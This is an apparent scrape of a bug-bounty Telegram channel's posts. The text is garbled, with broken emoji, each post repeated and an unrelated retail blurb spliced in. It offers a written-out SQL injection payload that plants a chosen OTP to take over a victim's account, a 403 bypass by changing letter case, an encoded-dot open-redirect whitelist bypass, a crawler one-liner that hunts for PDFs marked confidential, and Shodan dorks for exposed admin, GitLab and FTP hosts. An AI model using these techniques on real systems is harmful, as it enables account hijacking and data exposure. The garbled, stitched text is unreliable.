Brut Security pinned Β«Keep checking my old Posts to continue your learning Process!Β»
Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok
π7β€3
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
Credit- Kullai
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
Credit- Kullai
π7β€5
Bypass open redirection whitelisted using chinese dots: πππ
%E3%80%82
Tip: Keep eyes on SSO redirects ππ
credit: @adrielsec
%E3%80%82
Tip: Keep eyes on SSO redirects ππ
credit: @adrielsec
π«‘6β€4π₯2
π¨Subdominator - Unleash the Power of Subdomain Enumerationπ¨
π’Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
πLink- https://github.com/RevoltSecurities/Subdominator
π’Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
πLink- https://github.com/RevoltSecurities/Subdominator
π₯6β€3π3π1
β¨οΈOne-liner to find sensitive PDF fileβ¨οΈ
for i in `cat apex-domains.txt | gau --subs --threads 16 | grep -Ea '\.pdf' | httpx -silent -mc 200`; do if curl -s "$i" | pdftotext -q - - | grep -Eaiq 'internal use|classified'; then echo $i; fi; done
β€21π1
π¨Gourlexπ¨
π’It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
πLink https://github.com/trap-bytes/gourlex
π’It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
πLink https://github.com/trap-bytes/gourlex
β€4π4πΏ1
shodan dorks for recon :
1. http://ssl.cert.subject.CN:"*.target.com" http.title:"index of/"
2. http://ssl.cert.subject.CN:"*.target.com" http.title:"gitlab"
3. http://ssl.cert.subject.CN:"*. http://target.com" http.title:"gitlab"
4. http://ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. http://ssl.cert.subject.CN:"*. http://target.com" +200 http.title:"Admin"
1. http://ssl.cert.subject.CN:"*.target.com" http.title:"index of/"
2. http://ssl.cert.subject.CN:"*.target.com" http.title:"gitlab"
3. http://ssl.cert.subject.CN:"*. http://target.com" http.title:"gitlab"
4. http://ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
5. http://ssl.cert.subject.CN:"*. http://target.com" +200 http.title:"Admin"
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
π4π₯2β€1
π¨CVE-2024-34351:Next.js SSRF in Server Actionsπ¨
π’ Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
πDorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
πPoC: https://lnkd.in/gKbjiHVY
β Stay vigilant and take necessary precautions to protect your applications.
π’ Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
πDorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
πPoC: https://lnkd.in/gKbjiHVY
β Stay vigilant and take necessary precautions to protect your applications.
β€2π1